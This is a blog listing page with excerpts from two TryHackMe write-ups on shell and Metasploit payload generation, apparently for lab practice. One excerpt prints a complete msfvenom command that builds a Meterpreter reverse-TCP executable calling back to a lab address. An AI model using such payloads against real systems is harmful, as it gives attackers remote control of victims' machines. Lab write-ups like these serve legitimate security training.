JJebitokinsharonjebitok.com·2h ago · 7 min readShell Payload Generation & Delivery (TryHackMe)Link to the challenge on TryHackMe: Shell Payload Generation & Delivery Introduction Getting a shell on a target is the moment a CTF room stops being theoretical and starts being real, but the payload00
JJebitokinsharonjebitok.com·19h ago · 13 min readMetasploit: Payload Generation (TryHackMe)Link of the challenge on TryHackMe: Metasploit: Payload Generation msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.114.121.234 LPORT=4444 -f exe -o shell.exe [-] No platform was selected, ch00